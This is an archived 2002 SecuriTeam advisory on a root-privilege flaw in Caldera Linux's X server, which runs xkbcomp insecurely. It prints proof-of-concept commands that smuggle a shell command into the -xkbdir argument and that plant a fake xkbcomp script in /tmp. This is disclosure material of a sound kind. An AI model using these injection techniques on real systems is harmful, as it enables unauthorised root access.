[EXPL] Caldera Xserver Exploit Code (xkbcomp)

From: support@securiteam.com
Date: 08/30/02

From: support@securiteam.com
To: list@securiteam.com
Date: Fri, 30 Aug 2002 11:44:57 +0200 (CEST)

- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  Caldera Xserver Exploit Code (xkbcomp)

SUMMARY

The Xserver of the Caldera operating system calls xkbcomp in an insecure
manner while not dropping privileges. The following is a proof of concept
exploit code for the Caldera Linux X11 server.

DETAILS

Exploit:
The following proof of concepts were provided by Pavel Kankovsky:
   $ Xserver -xkbdir 'id > /tmp/I_WAS_HERE;'
   [exit X server]
   $ grep root /tmp/I_WAS_HERE && echo 'Gotcha!'

   $ cat > /tmp/xkbcomp
   #!/bin/sh
   id > /tmp/I_WAS_HERE
   [ctrl+d]
   $ chmod a+x /tmp/xkbcomp
   $ Xserver -xkbdir /tmp
   [X server executes /tmp/xkbcomp]

ADDITIONAL INFORMATION

The information has been provided by Pavel Kankovsky.

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages

  • [EXPL] SLMail PASS Buffer Overflow
    ... The following exploit code can be used to test your SLMail ... # Discovered by: Muts # ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
    (Securiteam)
  • [EXPL] Xsun (Sparc) Local Exploit (RGB_DB)
    ... struct TREE { ... main(int argc, char *argv) ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
    (Securiteam)
  • [UNIX] Posix_getpw* Ignores Safe_mode and Open_basedir Settings
    ... thus allowing a user to rebuild a complete ... user to know what accounts have what privileges and what accounts have ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
    (Securiteam)
  • [UNIX] php(Reactor) Cross Site Scripting Vulnerability
    ... Therefore, any user may construct a malicious link, gain ... the $fid and $tid variables should be integers. ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
    (Securiteam)
  • [NEWS] Active! mail Script Execution Vulnerability
    ... HREF="http://www.transware.co.jp/ ">TransWARECo. is a web-based e-mail ... malicious <script> tag in the header, the script will be executed upon the ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
    (Securiteam)